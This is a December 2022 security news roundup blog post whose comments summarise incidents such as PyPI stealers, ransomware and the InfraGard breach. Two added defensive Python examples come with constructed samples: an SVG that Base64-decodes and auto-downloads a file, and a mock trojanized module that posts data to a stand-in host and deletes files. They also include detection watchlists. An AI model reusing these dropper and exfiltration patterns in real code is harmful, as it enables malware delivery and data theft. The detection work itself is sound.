Cyber security news December 2022

This posting is here to collect cyber security news in December 2022.

I post links to security vulnerability news to comments of this article.

You are also free to post related links to comments.

355 Comments

  1. Tomi Engdahl says:

    The Government Workers Facing Seven Years in Prison for Not Updating Software
    https://slate.com/technology/2022/12/albania-cyberattack-iran-it-workers-arrested.html

    It’s not unheard of for government officials to lose their jobs following high-profile breaches.

    That’s exactly what happened in late November, when Albanian prosecutors requested that five government IT officials in the public administration department be placed under house arrest for failing to update the antivirus software on government computers.

    Reply
  2. Tomi Engdahl says:

    Hacker Reportedly Breaches US FBI Cybersecurity Forum
    Bureau Ushered a Phony CEO Who Stole Emails Into a Seat at InfraGard
    https://www.bankinfosecurity.com/hacker-reportedly-breaches-us-fbi-cybersecurity-forum-a-20712

    Reply
  3. Tomi Engdahl says:

    Airlines have reported recurring GPS disturbances in Lapland in recent weeks; Traficom: no danger to flight safety
    https://yle.fi/a/74-20009019
    On flights from Asia returning via the north, and on aircraft flying in Northern Norway near the Finnish border, the GPS signal may have disappeared for 5-10 minutes. The cause of the signal degradation is not known.
    "Our ground equipment has not detected any weakness in the signal," Pöntinen says.

    Reply
  4. Tomi Engdahl says:

    CISA Alert: Veeam Backup and Replication Vulnerabilities Being Exploited in Attacks https://thehackernews.com/2022/12/cisa-alert-veeam-backup-and-replication.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two vulnerabilities impacting Veeam Backup & Replication software to its Known Exploited Vulnerabilities (KEV) Catalog, citing evidence of active exploitation in the wild.

    Reply
  5. Tomi Engdahl says:

    Backdoor Targets FreePBX Asterisk Management Portal https://blog.sucuri.net/2022/12/backdoor-targets-freepbx-asterisk-management-portal.html
    During a recent investigation, I came across a simple piece of malware targeting FreePBX's Asterisk Management Portal which allowed attackers to arbitrarily add and delete users, as well as modify the website's .htaccess file.

    Reply
  6. Tomi Engdahl says:

    Agenda Ransomware Uses Rust to Target More Vital Industries https://www.trendmicro.com/en_us/research/22/l/agenda-ransomware-uses-rust-to-target-more-vital-industries.html
    This year, ransomware-as-a-service (RaaS) groups like BlackCat, Hive, and RansomExx have developed versions of their ransomware in Rust, a cross-platform language that makes it easier to tailor malware to different operating systems like Windows and Linux. In this blog entry, we shed light on Agenda (also known as Qilin), another ransomware group that has started using this language.

    Reply
  7. Tomi Engdahl says:

    Phishing attack uses Facebook posts to evade email security https://www.bleepingcomputer.com/news/security/phishing-attack-uses-facebook-posts-to-evade-email-security/
    A new phishing campaign uses Facebook posts as part of its attack chain to trick users into giving away their account credentials and personally identifiable information (PII). The emails sent to targets pretend to be a copyright infringement issue on one of the recipient’s Facebook posts, warning that their account will be deleted within 48 hours if no appeal is filed.

    Reply
  8. Tomi Engdahl says:

    3.5m IP cameras exposed, with US in the lead https://cybernews.com/security/millions-ip-cameras-exposed/
    New research by Cybernews shows an exponential rise in the uptake of internet-facing cameras. After looking at 28 of the most popular manufacturers, our research team found 3.5 million IP cameras exposed to the internet, signifying an eightfold increase since April 2021.

    Reply
  9. Tomi Engdahl says:

    Effective, fast, and unrecoverable: Wiper malware is popping up everywhere https://arstechnica.com/information-technology/2022/12/effective-fast-and-unrecoverable-wiper-malware-is-popping-up-everywhere/
    Over the past year, a flurry of destructive wiper malware from no fewer than nine families has appeared. In the past week, researchers cataloged at least two more, both exhibiting advanced codebases designed to inflict maximum damage. On Monday, researchers from Check Point Research published details of Azov, a previously unseen piece of malware that the company described as an effective, fast, and unfortunately unrecoverable data wiper.

    Reply
  10. Tomi Engdahl says:

    Microsoft Reclassifies Windows Flaw After IBM Researcher Proves Remote Code Execution
    https://www.securityweek.com/microsoft-reclassifies-windows-flaw-after-ibm-researcher-proves-remote-code-execution

    Microsoft has reclassified a Windows vulnerability after an IBM security researcher demonstrated that it can be exploited for remote code execution.

    In September, Microsoft announced that Windows and Windows Server updates patched CVE-2022-37958, an issue related to the SPNEGO Extended Negotiation (NEGOEX) security mechanism, which is used by clients and servers to negotiate the authentication protocol.

    An anonymous researcher informed Microsoft about the issue, which appeared to lead to information disclosure. The tech giant assigned it an ‘important’ rating.

    However, when it released its December 2022 Patch Tuesday updates, Microsoft also announced an update to the advisory for CVE-2022-37958, changing its rating to ‘critical’ and warning that it can be exploited for remote code execution.

    The advisory and the vulnerability’s rating were updated after IBM Security X-Force Red researcher Valentina Palmiotti showed that the flaw is in fact critical as it can be exploited by an unauthenticated attacker for remote code execution, it impacts a wide range of protocols, it does not require user interaction, and it’s potentially wormable.

    Critical Remote Code Execution Vulnerability in SPNEGO Extended Negotiation Security Mechanism
    https://securityintelligence.com/posts/critical-remote-code-execution-vulnerability-spnego-extended-negotiation-security-mechanism/

    In September 2022, Microsoft patched an information disclosure vulnerability in SPNEGO NEGOEX (CVE-2022-37958). On December 13, Microsoft reclassified the vulnerability as “Critical” severity after IBM Security X-Force Red Security Researcher Valentina Palmiotti discovered the vulnerability could allow attackers to remotely execute code.

    The vulnerability is in the SPNEGO Extended Negotiation (NEGOEX) Security Mechanism, which allows a client and server to negotiate the choice of security mechanism to use. This vulnerability is a pre-authentication remote code execution vulnerability impacting a wide range of protocols. It has the potential to be wormable.

    SPNEGO Extended Negotiation (NEGOEX) Security Mechanism Remote Code Execution Vulnerability
    https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37958

    Reply
  11. Tomi Engdahl says:

    FBI’s Vetted Info Sharing Network ‘InfraGard’ Hacked
    https://krebsonsecurity.com/2022/12/fbis-vetted-info-sharing-network-infragard-hacked/

    InfraGard, a program run by the U.S. Federal Bureau of Investigation (FBI) to build cyber and physical threat information sharing partnerships with the private sector, this week saw its database of contact information on more than 80,000 members go up for sale on an English-language cybercrime forum. Meanwhile, the hackers responsible are communicating directly with members through the InfraGard portal online — using a new account under the assumed identity of a financial industry CEO that was vetted by the FBI itself.

    On Dec. 10, 2022, the relatively new cybercrime forum Breached featured a bombshell new sales thread: The user database for InfraGard, including names and contact information for tens of thousands of InfraGard members.

    The FBI’s InfraGard program is supposed to be a vetted Who’s Who of key people in private sector roles involving both cyber and physical security at companies that manage most of the nation’s critical infrastructures — including drinking water and power utilities, communications and financial services firms, transportation and manufacturing companies, healthcare providers, and nuclear energy firms.

    “InfraGard connects critical infrastructure owners, operators, and stakeholders with the FBI to provide education, networking, and information-sharing on security threats and risks,” the FBI’s InfraGard fact sheet reads.

    Reply
  12. Tomi Engdahl says:

    https://hackaday.com/2022/12/16/this-week-in-security-scamming-the-fbi-in-the-wild-and-ai-security/

    First off, the good folks at FreeBSD have published some errata about the ping problem we talked about last week. First off, note that while ping does elevate to root privileges via setuid, those privileges are dropped before any data handling occurs. And ping on FreeBSD runs inside a Capsicum sandbox, a huge obstacle to system compromise from within ping. And finally, further examination of the bug in a real-world context casts doubt on the idea that Remote Code Execution (RCE) is actually possible due to stack layouts.

    https://lists.freebsd.org/archives/freebsd-security/2022-December/000108.html

    https://www.cl.cam.ac.uk/research/security/capsicum/

    Sage advice from [Florian Obser], OpenBSD developer. So seeing the ping problem in FreeBSD, he set about checking the OpenBSD ping implementation for identical or similar problems. The vulnerable code isn’t shared between the versions, so he reached for afl++, a fuzzing tool with an impressive list of finds.

    https://tlakh.xyz/fuzzing-ping.html

    https://aflplus.plus/

    Reply
  13. Tomi Engdahl says:

    Attackers use SVG files to smuggle QBot malware onto Windows systems
    https://www.bleepingcomputer.com/news/security/attackers-use-svg-files-to-smuggle-qbot-malware-onto-windows-systems/
    QBot malware phishing campaigns have adopted a new distribution method using SVG files to perform HTML smuggling that locally creates a malicious installer for Windows.
    This attack is made through embedded SVG files containing JavaScript that reassemble a Base64 encoded QBot malware installer that is automatically downloaded through the target’s browser.

    Reply
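    As an added example of the SVG smuggling pattern described above (written for this page, not tooling from the BleepingComputer article), the following triage check parses an SVG, pulls out any `<script>` content, and flags files where that script decodes a long Base64 blob and hands it to the browser as a download. The indicator strings and thresholds are this example's own choices, and the sample SVG is constructed and harmless: its payload is plain text, not an installer.

```python
"""Added example: detect the SVG + JavaScript + Base64 HTML-smuggling shape.
Not from the article; sample SVG is constructed and benign."""
import base64
import re
import xml.etree.ElementTree as ET

SVG_NS = "{http://www.w3.org/2000/svg}"
XHTML_NS = "{http://www.w3.org/1999/xhtml}"

# Assumed indicators of script that reassembles and drops a file in the browser.
DROPPER_HINTS = ("atob(", "Blob(", "createObjectURL", ".download", "msSaveOrOpenBlob")
# A quoted Base64 run long enough to be an embedded file rather than a token.
B64_BLOB = re.compile(r"['\"]([A-Za-z0-9+/]{200,}={0,2})['\"]")


def find_smuggling(svg_text: str) -> dict:
    """Report scripts found, dropper hints hit, and sizes of decodable blobs."""
    root = ET.fromstring(svg_text)
    script_tags = {SVG_NS + "script", XHTML_NS + "script", "script"}
    scripts = [el.text or "" for el in root.iter() if el.tag in script_tags]
    hints = sorted({h for s in scripts for h in DROPPER_HINTS if h in s})
    blob_bytes = []
    for s in scripts:
        for m in B64_BLOB.finditer(s):
            try:
                blob_bytes.append(len(base64.b64decode(m.group(1), validate=True)))
            except ValueError:  # binascii.Error is a ValueError subclass
                continue
    return {
        "scripts": len(scripts),
        "hints": hints,
        "blob_bytes": blob_bytes,
        # Script + at least two dropper hints + a real decodable blob.
        "suspicious": bool(scripts) and len(hints) >= 2 and bool(blob_bytes),
    }


# Constructed sample: the same shape as the campaign, with a harmless payload.
SAMPLE_PAYLOAD = b"constructed harmless payload " * 8
SAMPLE_SVG = f"""<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1">
  <script><![CDATA[
    var b = "{base64.b64encode(SAMPLE_PAYLOAD).decode()}";
    var bytes = Uint8Array.from(atob(b), c => c.charCodeAt(0));
    var blob = new Blob([bytes], {{type: "application/octet-stream"}});
    var a = document.createElement("a");
    a.href = URL.createObjectURL(blob); a.download = "invoice.zip"; a.click();
  ]]></script>
</svg>"""
BENIGN_SVG = '<svg xmlns="http://www.w3.org/2000/svg"><circle r="5"/></svg>'

if __name__ == "__main__":
    print(find_smuggling(SAMPLE_SVG))
    print(find_smuggling(BENIGN_SVG))
```

The check is deliberately conservative: an SVG that merely contains a script is common (animations), so it only fires when the script both decodes a sizeable blob and uses the browser download machinery. Mail gateways that render SVG as an image never see this, which is exactly why the technique works.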
  14. Tomi Engdahl says:

    Delete Your Phone Number From Twitter Before They Sell It
    Twitter is reportedly making plans to sell your location data, too.
    https://lifehacker.com/delete-your-phone-number-from-twitter-before-they-sell-1849897919

    Reply
  15. Tomi Engdahl says:

    NSA says Chinese hackers are exploiting a zero-day bug in popular networking gear
    https://techcrunch.com/2022/12/14/nsa-says-chinese-hackers-are-exploiting-a-zero-day-bug-in-popular-networking-gear/

    The U.S. National Security Agency is warning that Chinese government-backed hackers are exploiting a zero-day vulnerability in two widely used Citrix networking products to gain access to targeted networks.

    Reply
  16. Tomi Engdahl says:

    Dan Bilefsky / New York Times:
    The Metropolitan Opera restarts processing ticket orders, nine days after a suspected ransomware attack took its website offline and paralyzed its box office
    https://www.nytimes.com/2022/12/15/arts/music/met-opera-cyberattack.html

    Reply
  17. Tomi Engdahl says:

    The risk of escalation from cyberattacks has never been greater https://arstechnica.com/information-technology/2022/12/the-risk-of-escalation-from-cyberattacks-has-never-been-greater/
    With cyber, uncertainty over who is attacking pushes adversaries in a similar direction. The US shouldn't retaliate none of the time (that would make it look weak), and it shouldn't respond all of the time (that would retaliate against too many innocents). Its best move is to retaliate some of the time, somewhat capriciously, even though it risks retaliating against the wrong foe.

    Reply
  18. Tomi Engdahl says:

    Malicious SentinelOne PyPI package steals data from developers https://www.bleepingcomputer.com/news/security/malicious-sentinelone-pypi-package-steals-data-from-developers/
    Threat actors have published a malicious Python package on PyPI, named ‘SentinelOne,’ that pretends to be the legitimate SDK client for the trusted American cybersecurity firm but, in reality, steals data from developers. The package offers the expected functionality, which is easily accessing the SentinelOne API from within another project.
    However, this package has been trojanized to steal sensitive data from compromised developer systems.

    Reply
  19. Tomi Engdahl says:

    The app was still glitching 5 days after the cyberattack; this is how Helsinki Region Transport comments https://www.is.fi/digitoday/art-2000009276469.html
    THE cyberattack suffered by Helsinki Region Transport (HSL) last week is over, at least for now, but the HSL app only came back into operation today, Monday. The Journey Planner reported for most of the day that the service could not be reached. That is intentional.
    "We noticed that there has been a disturbance, which we have been investigating.
    We cannot yet say exactly what it is about. Something in it has broken," says HSL's communications manager Johannes Laitila.

    Reply
  20. Tomi Engdahl says:

    Gatekeeper's Achilles heel: Unearthing a macOS vulnerability https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/
    In this blog post, we share information about Gatekeeper and the vulnerability able to bypass it. We also share this research to emphasize the importance of collaboration among researchers and the security community to improve defenses for the larger ecosystem.

    Reply
  21. Tomi Engdahl says:

    FoxIt Patches Code Execution Flaws in PDF Tools
    https://www.securityweek.com/foxit-patches-code-execution-flaws-pdf-tools

    Foxit Software has rolled out a critical-severity patch to cover a dangerous remote code execution flaw in its flagship PDF Reader and PDF Editor products.

    The vulnerability, which was discovered and reported by researchers at the Renmin University of China, could be exploited via rigged PDF files or web pages, the company warned in an advisory.

    Foxit, which offers an alternative to Adobe's ubiquitous PDF processing tools, said the vulnerability is contained to the Windows platform and affects Foxit PDF Reader 12.0.2.12465 and earlier, and Foxit PhantomPDF 10.1.7.37777 and earlier.

    Reply
  22. Tomi Engdahl says:

    Malicious PyPI Module Poses as SentinelOne SDK
    https://www.securityweek.com/malicious-pypi-module-poses-sentinelone-sdk

    Security researchers with ReversingLabs warn of a new supply chain attack using a malicious PyPI module that poses as a software development kit (SDK) from the cybersecurity firm SentinelOne.

    The Python package was first uploaded on December 11 and received roughly 20 updates within the next two days. The module is completely unrelated to the legitimate threat detection firm, but abuses its brand reputation to attract unsuspecting victims.

    Seemingly a fully-functional SentinelOne client – the malicious SDK appears built on top of legitimate SentinelOne code – the package contains backdoor code meant for data theft.

    “This PyPI package is intended to serve as an SDK to abstract the access to SentinelOne’s APIs and make programmatic consumption of the APIs simpler,” ReversingLabs, which calls the attack ‘SentinelSneak’, notes.

    The malicious package contains two api.py files that engage in suspicious behavior such as enumerating files in a directory, executing a file, deleting a file/directory, and spawning a new process.

    SentinelSneak: Malicious PyPI module poses as security software development kit
    https://blog.reversinglabs.com/blog/sentinelsneak-malicious-pypi-module-poses-as-security-sdk

    A malicious Python file found on the PyPI repository adds backdoor and data exfiltration features to what appears to be a legitimate SDK client from SentinelOne.

    A malicious Python package is posing as a software development kit (SDK) for the security firm SentinelOne, researchers at ReversingLabs discovered. The package, SentinelOne has no connection to the noted threat detection firm of the same name and was first uploaded to PyPI, the Python Package Index, on Dec 11, 2022. It has been updated 20 times since, with the most recent version, 1.2.1, uploaded on Dec 13, 2022.

    The package appears to be a fully functional SentinelOne client, but contains a malicious backdoor, ReversingLabs threat researcher Karlo Zanki discovered.

    Reply
  23. Tomi Engdahl says:

    Google Workspace Gets Client-Side Encryption in Gmail
    https://www.securityweek.com/google-workspace-gets-client-side-encryption-gmail

    Google on Friday announced the beta availability of client-side encryption in Gmail for some of its Google Workspace customers.

    The feature is meant to improve the confidentiality of emails when they rest on Google’s servers, by applying encryption to the email body and attachments while providing Workspace customers with control over the encryption keys and the identity service used to access the keys.

    “Google Workspace already uses the latest cryptographic standards to encrypt all data at rest and in transit between our facilities. Client-side encryption helps strengthen the confidentiality of your data while helping to address a broad range of data sovereignty and compliance needs,” Google announced.

    The internet giant previously enabled client-side encryption for Workspace Enterprise Plus, Education Plus, and Education Standard customers, for services such as Google Drive, Docs, Sheets, Slides, Meet, and Calendar (beta).

    Reply
  24. Tomi Engdahl says:

    Now, client-side encryption is also available for Gmail, and those interested in trying it can apply for beta access until January 20, 2023.
    https://workspaceupdates.googleblog.com/2022/12/client-side-encryption-for-gmail-beta.html

    Reply
  25. Tomi Engdahl says:

    Cisco Warns of Many Old Vulnerabilities Being Exploited in Attacks
    https://www.securityweek.com/cisco-warns-many-old-vulnerabilities-being-exploited-attacks

    Cisco has updated multiple security advisories to warn of the malicious exploitation of severe vulnerabilities impacting its networking devices.

    Many of the bugs, which carry severity ratings of 'critical' or 'high', were addressed 4-5 years ago, but organizations that haven't patched their devices continue to be impacted.

    Last week, the tech giant added exploitation warnings to more than 20 advisories detailing security defects in Cisco IOS, NX-OS, and HyperFlex software.

    “In March 2022, the Cisco Product Security Incident Response Team (PSIRT) became aware of additional attempted exploitation of this vulnerability in the wild. Cisco continues to strongly recommend that customers upgrade to a fixed software release to remediate this vulnerability,” the warning reads.

    Five of the updated advisories resolve critical-severity vulnerabilities that could allow remote attackers to execute arbitrary code (RCE), cause a denial-of-service (DoS) condition, or execute arbitrary commands.

    Carrying a CVSS score of 9.8, the exploited vulnerabilities are tracked as CVE-2017-12240, CVE-2018-0171, CVE-2018-0125, CVE-2021-1497, and CVE-2018-0147, and impact Cisco IOS and IOS XE, the RV132W and RV134W routers, HyperFlex HX, and Secure Access Control System (ACS).

    Cisco also updated 15 advisories that deal with high-severity flaws in Cisco IOS and IOS XE, and one that addresses a high-severity arbitrary command execution issue in Small Business RV series routers. Several advisories detailing medium-severity bugs were also updated.

    Reply
  26. Tomi Engdahl says:

    The municipality of Säkylä says it has been the target of a cyberattack https://www.is.fi/digitoday/tietoturva/art-2000009278499.html

    THE municipality of Säkylä says on its Facebook page that it has been the target of a cyberattack.

    According to Säkylä's municipal manager Teijo Mäenpää, the attack was detected on Sunday evening with the help of the municipality's own IT monitoring system.

    "We have two IT specialists on the municipality's payroll. Strong outside expertise has also been brought in to help," Mäenpää says.

    According to the municipal manager, it is not yet known who or what could be behind the cyberattack. Mäenpää says that a criminal complaint has been filed.

    Reply
  27. Tomi Engdahl says:

    New ‘RisePro’ Infostealer Increasingly Popular Among Cybercriminals
    https://www.securityweek.com/new-risepro-infostealer-increasingly-popular-among-cybercriminals

    A recently identified information stealer named ‘RisePro’ is being distributed by pay-per-install malware downloader service ‘PrivateLoader’, cyberthreat firm Flashpoint reports.

    Written in C++, RisePro harvests potentially sensitive information from the compromised machines and then attempts to exfiltrate it as logs.

    RisePro was initially spotted on December 13, featured on a cybercrime marketplace called Russian Market, where cybercriminals upload and sell logs exfiltrated using stealers.

    According to Flashpoint, the malware appears to be based on Vidar stealer, which has been analyzed several times in the past.

    A fork of the Arkei stealer itself, Vidar is known for downloading a series of dependencies and configuration settings from its command-and-control (C&C) server. The infostealer was cracked in 2018 and several clones were seen in the past, including the ‘Oski’ and ‘Mars’ stealers.

    https://flashpoint.io/blog/risepro-stealer-and-pay-per-install-malware-privateloader/

    Reply
  28. Tomi Engdahl says:

    Congress Moves to Ban TikTok From US Government Devices
    https://www.securityweek.com/congress-moves-ban-tiktok-us-government-devices

    TikTok would be banned from most U.S. government devices under a spending bill Congress unveiled early Tuesday, the latest push by American lawmakers against the Chinese-owned social media app.

    The $1.7 trillion package includes requirements for the Biden administration to prohibit most uses of TikTok or any other app created by its owner, ByteDance Ltd. The requirements would apply to the executive branch — with exemptions for national security, law enforcement and research purposes — and don’t appear to cover Congress, where a handful of lawmakers maintain TikTok accounts.

    TikTok is consumed by two-thirds of American teens and has become the second-most popular domain in the world. But there's long been bipartisan concern in Washington that Beijing would use legal and regulatory power to seize American user data or try to push pro-China narratives or misinformation.

    Reply
  29. Tomi Engdahl says:

    DraftKings Data Breach Impacts Personal Information of 68,000 Customers
    https://www.securityweek.com/draftkings-data-breach-impacts-personal-information-68000-customers

    Sports betting firm DraftKings says the personal data of 68,000 individuals has been compromised in a recent data breach.

    The incident, initially disclosed in November, was the result of a credential stuffing attack and not a breach of DraftKings’ systems, the company says.

    Credential stuffing involves the use of leaked credentials (usernames, email addresses, and passwords) obtained from a third-party source to access an account on a different service. Such attacks are successful only because some individuals use the same credentials for accounts on different services.

    DraftKings also announced at the time that the attackers withdrew roughly $300,000 from some of the compromised accounts, and that it would restore all the stolen funds.

    https://twitter.com/DK_Assist/status/1594769117894279168

    Reply
  30. Tomi Engdahl says:

    Raspberry Robin worm drops fake malware to confuse researchers https://www.bleepingcomputer.com/news/security/raspberry-robin-worm-drops-fake-malware-to-confuse-researchers/
    The Raspberry Robin malware is now trying its hand at some trickery by dropping a fake payload to confuse researchers and evade detection when it detects it’s being run within sandboxes and debugging tools.
    This new tactic was discovered by Trend Micro researchers who observed Raspberry Robin in recent attacks against telecommunication service providers and government systems. Raspberry Robin is a worm-like malware dropper that sells initial access to compromised networks to ransomware gangs and malware operators. It has been previously associated with FIN11 and the Clop gang, as well as Bumblebee, IcedID, and TrueBot payload distribution. The malware reaches targeted systems via malicious USB drives that infect the device with malware when inserted and the included .LNK file is double-clicked.

    Reply
  31. Tomi Engdahl says:

    Play ransomware claims attack on German hotel chain H-Hotels
    https://www.bleepingcomputer.com/news/security/play-ransomware-claims-attack-on-german-hotel-chain-h-hotels/
    The Play ransomware gang has claimed responsibility for a cyber attack on H-Hotels (h-hotels.com) that has resulted in communication outages for the company. H-Hotels is a hospitality business with 60 hotels in 50 locations across Germany, Austria, and Switzerland, offering a total capacity of 9,600 rooms. The hotel chain employs 2,500 people and is one of the largest in the DACH region, operating under H-Hotels' and the sub-brands Hyperion, H4 Hotels, H2 Hotels, H+ Hotels, H.ostels, and H.omes. H-Hotels disclosed the cyberattack last week and stated that the security incident occurred on Sunday, December 11th, 2022. "According to the first findings of internal and external IT specialists, cybercriminals managed to break through the extensive technical and organizational protection systems of IT in a professional attack," explained H-Hotels' security incident notice.

    Reply
  32. Tomi Engdahl says:

    Hackers bombard PyPi platform with information-stealing malware https://www.bleepingcomputer.com/news/security/hackers-bombard-pypi-platform-with-information-stealing-malware/
    The PyPI Python package repository is being bombarded by a wave of information-stealing malware hiding inside malicious packages uploaded to the platform to steal software developers' data. The malware dropped in this campaign is a clone of the open-source W4SP Stealer, responsible for a previous widespread malware infection on PyPI in November 2022. Since then, an additional 31 packages dropping W4SP have been removed from the PyPI repository, with the malware's operators continuing to seek new ways to reintroduce their malware on the platform.

    Reply
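    Comments 18 and 22 (the trojanized SentinelOne SDK) and the W4SP wave above share one shape: a package that looks functional but whose modules enumerate files, spawn processes, delete things, decode-and-execute blobs, or phone home. As an added example (written for this page, not ReversingLabs' or BleepingComputer's tooling), the following does a static first pass over a package's Python source with the `ast` module and reports calls in those categories, which is the triage a reviewer runs before installing a dependency with a famous name. The watchlist, categories and verdict thresholds are this example's own choices, and the sample module is constructed and is parsed, never executed.

```python
"""Added example: AST triage of a Python package for data-theft behaviours.
Watchlist and sample source are constructed for this example."""
import ast
from collections import defaultdict

# Dotted call names worth a second look inside something sold as an "SDK client".
WATCHLIST = {
    "enumerate_files": {"os.listdir", "os.walk", "os.scandir", "glob.glob"},
    "delete": {"os.remove", "os.unlink", "os.rmdir", "shutil.rmtree"},
    "spawn": {"subprocess.Popen", "subprocess.run", "subprocess.call",
              "os.system", "os.popen", "os.execv"},
    "dynamic_exec": {"exec", "eval", "compile", "base64.b64decode",
                     "marshal.loads", "zlib.decompress"},
    "network": {"urllib.request.urlopen", "requests.post", "requests.get",
                "socket.socket", "http.client.HTTPConnection"},
}


def _dotted(node: ast.AST) -> str:
    """Rebuild 'a.b.c' from a Call's func expression; '' if not a plain name path."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def triage_source(source: str, filename: str = "<module>") -> dict:
    """Map each watchlist category to the (line, call) pairs found in source."""
    tree = ast.parse(source, filename)
    hits = defaultdict(list)
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _dotted(node.func)
            for category, names in WATCHLIST.items():
                if name in names:
                    hits[category].append((node.lineno, name))
    return {k: sorted(v) for k, v in hits.items()}


def verdict(hits: dict) -> str:
    """Stealer shape: gathers or decodes something AND sends something out.
    Anything else on the watchlist is merely 'review'."""
    cats = set(hits)
    if "network" in cats and cats & {"enumerate_files", "dynamic_exec"}:
        return "suspicious"
    return "review" if cats else "clean"


# Constructed stand-in for a trojanized api.py. It is only parsed, never run.
SAMPLE_API_PY = '''
import os, base64, subprocess, requests

class SentinelClient:
    """constructed: looks like a working API client"""
    def list_agents(self):
        return requests.get("https://example.invalid/agents").json()

def _collect(path):
    for root, _dirs, files in os.walk(path):
        for f in files:
            yield os.path.join(root, f)

def _beacon(data):
    requests.post("https://example.invalid/upload", data=data)
    subprocess.Popen(["rm", "-rf", "/tmp/x"])
'''

if __name__ == "__main__":
    found = triage_source(SAMPLE_API_PY, "api.py")
    for category, calls in found.items():
        print(f"{category}: {calls}")
    print("verdict:", verdict(found))
```

This catches the obvious case and nothing else: a package that builds the call name at runtime (`getattr(os, "wa" + "lk")`) or unpacks code from a string sails past it. It is cheap enough to run over every file in a fresh sdist before `pip install`, and the line numbers give a reviewer somewhere to start reading.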
  33. Tomi Engdahl says:

    KmsdBot Botnet Suspected of Being Used as DDoS-for-Hire Service https://thehackernews.com/2022/12/kmsdbot-botnet-suspected-of-being-used.html
    An ongoing analysis of the KmsdBot botnet has raised the possibility that it’s a DDoS-for-hire service offered to other threat actors. This is based on the different industries and geographies that were attacked, web infrastructure company Akamai said. Among the notable targets included FiveM and RedM, which are game modifications for Grand Theft Auto V and Red Dead Redemption 2, as well as luxury brands and security firms. KmsdBot is a Go-based malware that leverages SSH to infect systems and carry out activities like cryptocurrency mining and launch commands using TCP and UDP to mount distributed denial-of-service (DDoS) attacks.

    Reply
  34. Tomi Engdahl says:

    Guardian newspaper hit by suspected ransomware attack, staff told not to come to office https://therecord.media/guardian-newspaper-hit-by-suspected-ransomware-attack-staff-told-not-to-come-to-office/
    Staff at The Guardian newspaper have been told not to come into the office and to work from home for the rest of the week due to a suspected ransomware attack which struck late on Tuesday. The attack has impacted a number of business services at the 200-year-old news organization, but not its online site and apps, which will continue to publish stories. An email sent to The Guardian's employees on Wednesday and seen by The Record tells staff: "The issues affecting King's Place, the VPN, and the wires are ongoing, and our IT and engineering teams are working to resolve them."

    Reply
  35. Tomi Engdahl says:

    GodFather Android Banking Trojan Targeting Users of Over 400 Banking and Crypto Apps https://thehackernews.com/2022/12/godfather-android-banking-trojan.html
    An Android banking trojan known as GodFather is being used to target users of more than 400 banking and cryptocurrency apps spanning across 16 countries. This includes 215 banks, 94 crypto wallet providers, and 110 crypto exchange platforms serving users in the U.S., Turkey, Spain, Italy, and Canada, among others, Singapore-headquartered Group-IB said in a report shared with The Hacker News. The malware, like many financial trojans targeting the Android ecosystem, attempts to steal user credentials by generating convincing overlay screens (aka web fakes) that are served atop target applications.

    Reply
  36. Tomi Engdahl says:

    Okta’s source code stolen after GitHub repositories hacked https://www.bleepingcomputer.com/news/security/oktas-source-code-stolen-after-github-repositories-hacked/
    Okta, a leading provider of authentication services and Identity and Access Management (IAM) solutions, says that its private GitHub repositories were hacked this month. According to a 'confidential' email notification sent by Okta and seen by BleepingComputer, the security incident involves threat actors stealing Okta's source code.

    Reply
  37. Tomi Engdahl says:

    FBI warns of search engine ads pushing malware, phishing https://www.bleepingcomputer.com/news/security/fbi-warns-of-search-engine-ads-pushing-malware-phishing/
    The FBI warns that threat actors are using search engine advertisements to promote websites distributing ransomware or stealing login credentials for financial institutions and crypto exchanges. In today’s public service announcement, the federal law enforcement agency said threat actors purchase advertisements that impersonate legitimate businesses or services. These ads appear at the top of search result pages and link to sites that look identical to the impersonated company’s website. “When a user searches for that business or service, these advertisements appear at the very top of search results with minimum distinction between an advertisement and an actual search result,” warns the FBI. “These advertisements link to a webpage that looks identical to the impersonated business’s official webpage.”

    Reply
  38. Tomi Engdahl says:

    Russians hacked JFK airport's taxi dispatch system for profit https://www.bleepingcomputer.com/news/security/russians-hacked-jfk-airport-s-taxi-dispatch-system-for-profit/
    Two U.S. citizens were arrested for allegedly conspiring with Russian hackers to hack the John F. Kennedy International Airport (JFK) taxi dispatch system to move specific taxis to the front of the queue in exchange for a $10 fee. The taxi dispatch system is a computer-controlled system that ensures that taxis are dispatched from the airport's holding lot to pick up the next available fare at the appropriate terminal. Usually, taxis must wait several hours in the lot before the dispatch system summons them. This system was put in place to maintain a fair operational environment for taxi drivers in an area with significant demand for their services.

    Reply
  39. Tomi Engdahl says:

    Restaurant platform SevenRooms confirms data breach https://www.malwarebytes.com/blog/news/2022/12/restaurant-platform-sevenrooms-confirms-fallout-from-third-party-vendor-data-breach
    SevenRooms, a guest experience and retention platform for food establishments and hospitality organisations, has confirmed it has fallen victim to a third-party vendor data breach. Mostly known for its customer management platform, SevenRooms' breach came to light after stolen data was seen for sale on an underground forum.
    SevenRooms confirmed to Bleeping Computer that the data, samples of which were posted on the forum on 15th December, is real. This data selection contained thousands of files containing data on SevenRooms customers.

    Reply
  40. Tomi Engdahl says:

    Ransomware gang uses new Microsoft Exchange exploit to breach servers https://www.bleepingcomputer.com/news/security/ransomware-gang-uses-new-microsoft-exchange-exploit-to-breach-servers/
    Play ransomware threat actors are using a new exploit chain that bypasses ProxyNotShell URL rewrite mitigations to gain remote code execution (RCE) on vulnerable servers through Outlook Web Access (OWA). Cybersecurity firm CrowdStrike spotted the exploit (dubbed OWASSRF) while investigating Play ransomware attacks where compromised Microsoft Exchange servers were used to infiltrate the victims' networks. To execute arbitrary commands on compromised servers, the ransomware operators leveraged Remote PowerShell to abuse CVE-2022-41082, the same bug exploited by ProxyNotShell.

    Reply
